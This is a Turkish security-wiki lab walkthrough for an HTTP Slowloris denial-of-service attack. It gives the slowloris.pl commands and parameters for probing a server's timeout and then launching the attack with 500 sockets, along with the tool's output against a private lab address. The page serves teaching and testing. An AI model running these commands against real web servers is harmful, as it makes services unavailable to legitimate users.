HTTP Slowloris DoS Saldırısı Gerçekleştirme

BGA Security Wiki sitesinden
Şuraya atla: kullan, ara

Amaç:

HTTP Slowloris saldırısı ile hedef sistemi hizmet veremez hale getirmek.

Lab Senaryosu:

Hedef web sunucusuyla çok sayıda açık HTTP bağlantısı oluşturulup normal kullanıcılara hizmet vermesi engellenir.

Araç:

  • slowloris.pl


Adımlar:

Slowloris saldırısındaki temel mantık, hedef sunucuya çok sayıda tamamlanmamış HTTP isteği gönderip, sunucunun zaman aşımı süresine göre ayarlanan bir sıklıkta bu isteklerin devamı niteliğinde bilgiler göndermek ancak hiçbir zaman isteği tamamlamayıp bağlantıların sürekli açık kalmasını sağlamaktır. Bu sayede sunucu, gerçekten hizmet almaya çalışan kullanıcılara cevap veremez hale getirilebilir.

  • slowloris.pl betiği “-dns hedefsite -port hedefport -test” parametreleriyle çalıştırılır. Bu sayede sunucunun zaman aşımı süresi belirlenmeye çalışılır.
This test could take up to 14.3666666666667 minutes.
Connection successful, now comes the waiting game...
Trying a 2 second delay:
Worked.
Trying a 30 second delay:
Worked.
Trying a 90 second delay:
Worked.
Trying a 240 second delay:
Failed after 240 seconds.
  • Birinci adımda soketler için kullanılabilecek zaman aşımı süresi 90 saniye olarak tespit edilmiştir. Buna göre saldırıyı başlatacak komut

./slowloris.pl -dns hedefsunucu -port hedefport -timeout 90 -num 500 -tcpto 5 şeklinde olur. Farklı olan parametreler -timeout 90 soketler için zamanaşımı süresi -num 500 kullanılacak thread sayısı -tcpto tcp zamanaşımı süresi şeklindedir.

Connecting to 192.168.41.135:80 every 90 seconds with 500 sockets:
Building sockets.
Building sockets.
Sending data.
Current stats: Slowloris has now sent 319 packets successfully.
This thread now sleeping for 90 seconds...

Building sockets.
Building sockets.
Sending data.
Current stats: Slowloris has now sent 609 packets successfully.
This thread now sleeping for 90 seconds...


Sending data.
Current stats: Slowloris has now sent 1568 packets successfully.
This thread now sleeping for 90 seconds...

Sending data.
Current stats: Slowloris has now sent 1793 packets successfully.
This thread now sleeping for 90 seconds...


Betiğin desteklediği ek özellikler “perldoc ./slowloris” komutu ile incelenebilir.